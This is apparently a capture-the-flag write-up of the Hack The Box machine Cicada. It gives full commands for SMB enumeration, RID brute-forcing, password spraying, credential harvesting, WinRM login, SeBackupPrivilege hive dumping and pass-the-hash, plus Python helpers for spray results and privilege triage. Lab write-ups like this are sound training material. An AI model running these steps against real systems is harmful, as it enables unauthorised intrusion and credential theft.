HTB: Cicada

Summary

Cicada is a Windows host running the typical Active Directory services. Reaching the user flag relied on enumeration: a guest-readable SMB share, RID brute-forcing to build a user list, a password spray with the default password found in an HR notice, and a password left in a domain user's Description field. For the system flag, I abused the user's SeBackupPrivilege to export the SAM and SYSTEM hives and extract the Administrator hash.

User flag

Information gathering

Nmap

sudo nmap -sV -O 10.129.248.46

The Nmap scan showed the usual open ports for an Active Directory domain controller. Port 5985 is also open, which usually means WinRM is enabled and the host can be reached with a remote PowerShell session once valid credentials are found.

SMB

By listing the shares, I identified the HR share with READ permissions for the guest user.

nxc smb 10.129.248.46 -d cicada.htb -u 'guest' -p '' --shares

I downloaded the files to my machine with the spider_plus module (DOWNLOAD_FLAG=True saves every readable file) to analyze them locally.

nxc smb 10.129.248.46 -u guest -p '' -M spider_plus -o DOWNLOAD_FLAG=True

In the downloaded files, there’s a Notice from HR.txt text file that contains the default password for new hires.

Now I just needed to list the users from cicada.htb to hopefully find one that still uses the default password.

To find existing users I brute-forced RIDs over the same guest-level access (an unknown username with an empty password is treated as guest here, so the -u value only needs to be an account that does not exist).

nxc smb 10.129.248.46 -d cicada.htb -u cicada -p '' --rid-brute

Then I could use that list of users for a password spray with the default password. Note that nxc stops after the first successful login by default; pass --continue-on-success to test every user, and watch for STATUS_ACCOUNT_LOCKED_OUT in the output, since a spray can lock accounts when the domain lockout threshold is low.

nxc smb 10.129.248.46 -d cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
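The two nxc runs above (RID brute-force, then spray) produce a lot of output that has to be turned into users.txt and then read back for hits. The following is an added helper for this writeup, not part of the original post or of nxc itself: it parses the `--rid-brute` lines into a spray list (user accounts only, machine accounts and disabled built-ins dropped) and sorts spray results into valid credentials, lockouts and plain failures. The sample lines are constructed to mimic nxc's output format; the hostname DC01, the RIDs and the locked-out user jane.doe are assumptions.

```python
"""Turn raw NetExec (nxc) SMB output into a spray list and spray verdicts.

Added example for this writeup, not part of the original post or of nxc.
The sample lines below are constructed to mimic nxc's line format for
--rid-brute and for a password spray; hostname, RIDs and jane.doe are assumed.
"""
import re

# --rid-brute lines end with "<rid>: <DOMAIN>\<name> (<SidType...>)".
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)
# Spray lines: "[+] domain\user:password" on success,
# "[-] domain\user:password STATUS_..." on failure.
SPRAY_LINE = re.compile(
    r"\[(?P<res>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>\S*)(?:\s+(?P<status>\S+))?"
)

# Constructed sample of `nxc smb ... --rid-brute` output (hostname and RIDs assumed).
RID_BRUTE_SAMPLE = r"""
SMB         10.129.248.46   445    DC01             [*] Windows Server (name:DC01) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.248.46   445    DC01             498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.248.46   445    DC01             500: CICADA\Administrator (SidTypeUser)
SMB         10.129.248.46   445    DC01             501: CICADA\Guest (SidTypeUser)
SMB         10.129.248.46   445    DC01             502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.248.46   445    DC01             512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.248.46   445    DC01             1000: CICADA\DC01$ (SidTypeUser)
SMB         10.129.248.46   445    DC01             1104: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.248.46   445    DC01             1106: CICADA\david.orelious (SidTypeUser)
SMB         10.129.248.46   445    DC01             1601: CICADA\emily.oscars (SidTypeUser)
"""

# Constructed sample of a spray run; jane.doe is a placeholder added to show lockout handling.
SPRAY_SAMPLE = r"""
SMB         10.129.248.46   445    DC01             [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.248.46   445    DC01             [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB         10.129.248.46   445    DC01             [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.129.248.46   445    DC01             [-] cicada.htb\jane.doe:Cicada$M6Corpb*@Lp#nZp!8 STATUS_ACCOUNT_LOCKED_OUT
"""

DEFAULT_SKIP = frozenset({"Guest", "krbtgt"})  # disabled by default, not worth a spray attempt


def users_from_rid_brute(lines, skip=DEFAULT_SKIP, drop_machine_accounts=True):
    """Return user account names (SidTypeUser only) in RID order, ready for users.txt."""
    users = []
    for line in lines:
        m = RID_LINE.search(line)
        if not m or m.group("kind") != "SidTypeUser":
            continue  # groups, aliases and banner lines are not spray targets
        name = m.group("name")
        if drop_machine_accounts and name.endswith("$"):
            continue  # computer accounts have long random passwords
        if name in skip:
            continue
        users.append(name)
    return users


LOCKOUT_STATUSES = {"STATUS_ACCOUNT_LOCKED_OUT"}


def spray_results(lines):
    """Split spray output into valid creds, locked-out users and other failures.

    A lockout means the spray should stop: further attempts may lock other
    accounts too if the policy threshold is low.
    """
    result = {"valid": [], "locked": [], "failed": []}
    for line in lines:
        m = SPRAY_LINE.search(line)
        if not m:
            continue
        user, password, status = m.group("user"), m.group("password"), m.group("status")
        if m.group("res") == "+":
            result["valid"].append((user, password))
        elif status in LOCKOUT_STATUSES:
            result["locked"].append(user)
        else:
            result["failed"].append((user, status))
    return result


if __name__ == "__main__":
    users = users_from_rid_brute(RID_BRUTE_SAMPLE.splitlines())
    with open("users.txt", "w") as fh:
        fh.write("\n".join(users) + "\n")
    verdict = spray_results(SPRAY_SAMPLE.splitlines())
    print("users.txt:", users)
    print("valid:", verdict["valid"])
    if verdict["locked"]:
        print("STOP spraying, lockouts seen for:", verdict["locked"])
```

In practice you pipe the real nxc output into these functions (`nxc ... --rid-brute | tee rid.txt`, then read the file); the regexes anchor on the trailing `<rid>: DOMAIN\name (SidType...)` and `[+]`/`[-] domain\user:password` fragments so the leading columns nxc prints do not matter.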

The user michael.wrightson still had the default password. I then used that account to enumerate domain users and found the password of david.orelious stored in his Description field.

nxc smb 10.129.248.46 -d cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

By enumerating shares with that new user, I gained access to the DEV share, which contained a PowerShell script called Backup_script.ps1.

nxc smb 10.129.248.46 -d cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus -o DOWNLOAD_FLAG=True

The script contained hard-coded credentials for another user called emily.oscars.

Exploitation

Evil-WinRM

With that new user I tried connecting to the host directly over WinRM (port 5985 was open).

evil-winrm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i 10.129.248.46

The connection was successful, and from there I could read the user flag on the Desktop.

System flag

Information gathering

User privileges

Once connected as emily.oscars, I listed her privileges.

SeBackupPrivilege is a well-known Windows privilege that can be abused for privilege escalation: it grants read access to any file or registry key regardless of its ACL (backup semantics), so a holder can export the SAM and SYSTEM hives that standard users cannot otherwise read.
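When reading the privilege list (whoami /priv) it helps to triage it automatically, because several privileges besides SeBackupPrivilege have a known escalation primitive and the State column is easy to misread. The following is an added example for this writeup, not code from the original post: it parses whoami /priv output and reports every held privilege with a known abuse path. The sample output is constructed to look like whoami /priv and is not a capture from the box; the privilege set shown is an assumption.

```python
"""Triage `whoami /priv` output for privileges that give a known escalation path.

Added example for this writeup, not part of the original post. The sample
output is constructed to look like `whoami /priv`; it is not a capture from
the box, and the privilege set is an assumption.
"""

# Privileges with a well-known abuse primitive (names are the real Windows constants).
ABUSABLE = {
    "SeBackupPrivilege": "read any file or registry key regardless of ACL "
                         "(reg save HKLM\\SAM and HKLM\\SYSTEM, then secretsdump)",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object, then grant yourself access",
    "SeDebugPrivilege": "open any process, e.g. to dump LSASS memory",
    "SeImpersonatePrivilege": "impersonate tokens, the primitive behind potato-style SYSTEM escalations",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# Constructed sample of `whoami /priv` output (assumed privilege set, not from the box).
WHOAMI_PRIV_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""


def parse_whoami_priv(text):
    """Map privilege name -> state ("Enabled"/"Disabled").

    whoami pads each column to its widest entry plus one space, so the longest
    description is separated from its State by a single space and splitting on
    runs of whitespace would break there. The first and last tokens of a row
    are reliable, so only those are used.
    """
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True  # the ==== rule ends the header
            continue
        if not in_table or not line.strip():
            continue
        tokens = line.split()
        privs[tokens[0]] = tokens[-1]
    return privs


def abusable_privileges(privs):
    """Return (name, state, what it buys you) for every held privilege in ABUSABLE.

    "Disabled" only means not currently enabled in the token; the privilege is
    still held, and tools such as reg.exe enable it for themselves with
    AdjustTokenPrivileges, so Disabled entries are reported as well.
    """
    return [(name, privs[name], ABUSABLE[name]) for name in ABUSABLE if name in privs]


if __name__ == "__main__":
    for name, state, note in abusable_privileges(parse_whoami_priv(WHOAMI_PRIV_SAMPLE)):
        print(f"{name} ({state}): {note}")
```

Paste the real whoami /priv output into the function instead of the sample; the Disabled caveat matters most for WinRM sessions, where privileges often show as Disabled even though they can be used.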

Exploitation

SeBackupPrivilege

I saved the SAM and SYSTEM registry hives (reg save succeeds here because the backup privilege lets it read the otherwise ACL-protected HKLM\SAM key) and downloaded them through the evil-winrm session.

reg save hklm\sam sam.hive; reg save hklm\system system.hive
download *

I then used secretsdump.py offline to decrypt the SAM with the boot key from SYSTEM and dump the NTLM hashes.

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Using the obtained Administrator NT hash directly (pass-the-hash, no cracking needed), I connected to the host and obtained the system flag. Note that on a domain controller the SAM hive holds the local (DSRM) Administrator rather than the domain accounts, which live in ntds.dit; on this box the hash was nevertheless accepted for the Administrator logon.

evil-winrm -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -i 10.129.248.46